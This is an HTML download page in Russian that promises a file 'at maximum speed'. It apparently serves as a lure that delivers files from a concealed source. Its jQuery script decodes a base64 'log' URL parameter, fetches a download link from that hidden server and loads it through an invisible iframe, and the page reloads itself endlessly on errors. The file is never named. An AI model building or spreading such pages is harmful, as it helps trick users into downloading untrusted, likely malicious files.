<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <title>Скачать на высокой скорости</title>
    <link type="text/css" href="https://s3.eu-west-2.amazonaws.com/trusted-foundation/hexagon-preloader.css" rel="stylesheet">
    <style>
        a.download {
            position: relative;
            display: inline-block;
            font-family: Arial,Helvetica,FreeSans,"Liberation Sans","Nimbus Sans L",sans-serif;
            font-size: 2.5em;
            font-weight: 700;
            color: rgb(245,245,245);
            text-shadow: 0 -1px rgba(0,0,0,.1);
            text-decoration: none;
            user-select: none;
            padding: 0.3em 2em;
            outline: none;
            border: none;
            border-radius: 3px;
            background: #0c9c0d linear-gradient(#82d18d, #0c9c0d);
            box-shadow: inset #72de26 0 -1px 1px, inset 0 1px 1px #98ff98, #3caa3c 0 0 0 1px, rgba(0,0,0,.3) 0 2px 5px;
            -webkit-animation: pulsate 1.2s linear infinite;
            animation: pulsate 1.2s linear infinite;
        }
        a.download:hover {
            -webkit-animation-play-state: paused;
            animation-play-state: paused;
            cursor: pointer;
        }
        a.download:active {
            top: 1px;
            color: #fff;
            text-shadow: 0 -1px rgba(0,0,0,.3), 0 0 5px #ffd, 0 0 8px #fff;
            box-shadow: 0 -1px 3px rgba(0,0,0,.3), 0 1px 1px #fff, inset 0 1px 2px rgba(0,0,0,.8), inset 0 -1px 0 rgba(0,0,0,.05);
        }
        @-webkit-keyframes pulsate {
            50% {color: #fff; text-shadow: 0 -1px rgba(0,0,0,.3), 0 0 5px #ffd, 0 0 8px #fff;}
        }
        @keyframes pulsate {
            50% {color: #fff; text-shadow: 0 -1px rgba(0,0,0,.3), 0 0 5px #ffd, 0 0 8px #fff;}
        }
        html, body{
            height: 100%;
            margin: 0;
        }
        body{
            font-family: 'Open Sans', sans-serif;
        }
        .header{
            width: 100%;
            height: 40%;
            background-color: black;
            position: relative;
            text-align: center;
        }
        h1, p{
            margin: 0;
            color: white;
        }
        h1{
            font-size: 40px;
            padding-top: 200px;
        }
        p{
            font-size: 21px;
        }
        .draw{
            position: absolute;
            left: 50%;
            top: 300px;
            width: 363px;
            margin-left: -181px;
        }
        .footer{
            text-align: center;
            padding-top: 20px;
        }
        .footer p{
            font-size: 18px;
            color: #808080;
            padding-top: 20px;
        }
        .footer p.desc{
            text-align: left;
            padding: 20px 100px;
        }
        .anti{
            width: 586px;
            margin: 0 auto;
            overflow: hidden;
            padding: 50px 0;
        }
        .anti img{
            float: left;
        }
    </style>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
    <script>
        $(document).ready(function() {
            var location_url = new URL(location.href);
            
            var url = atob(location_url.searchParams.get("log"));
            var remake = false;
            var dataUrl = '';
            
            $.ajax({
                'url': url,
                'success': function(data) {
                    $.ajax({
                        'url': url + '/?gn=1',
                        'success': function(data) {
                            $('#content-download a').attr('href', data);
                            $('#header-download').show();
                            $('#content-download').show();
                            if (data.reMakeFile) {
                                remake = true;
                            }
                            $('#header-preload').hide();
                            $('#content-preloader').hide();
                            dataUrl = data;
                            $('#dl a').addClass('readyLink');
                        },
                        'error': function(data) {
                            location.reload();
                        },
                        timeout: 5000
                    });
                },
                'error': function(data) {
                    location.reload();
                },
                timeout: 3000
            });
            
            $('#content-download a').click(function() {
                document.getElementById('cout').src = $('#content-download a').attr('href');
                return false;
            });
        });
    </script>
</head>
<body>
<div id="main" style="height: 100%;">
    <div class="header">
        <div id="header-preload">
            <h1>Идет подготовка к загрузке файла</h1>
        </div>
        <div id="header-download" style="display: none">
            <h1>Файл готов к загрузке</h1>
            <p>на максимальной скорости</p>
        </div>
        <div class="draw">

        </div>
    </div>
    <div class="footer">
            <iframe id="cout" style="display:none;"></iframe>
            <div id="content-preloader" class="preloader loading">
                <span class="slice"></span>
                <span class="slice"></span>
                <span class="slice"></span>
                <span class="slice"></span>
                <span class="slice"></span>
                <span class="slice"></span>
            </div>
            <div id="content-download" style="display: none">
                <a class="download" href="">Скачать</a>
                <p>Нажмите если загрузка не началась автоматически</p>
            </div>
    </div>
</div>
</body>
</html>
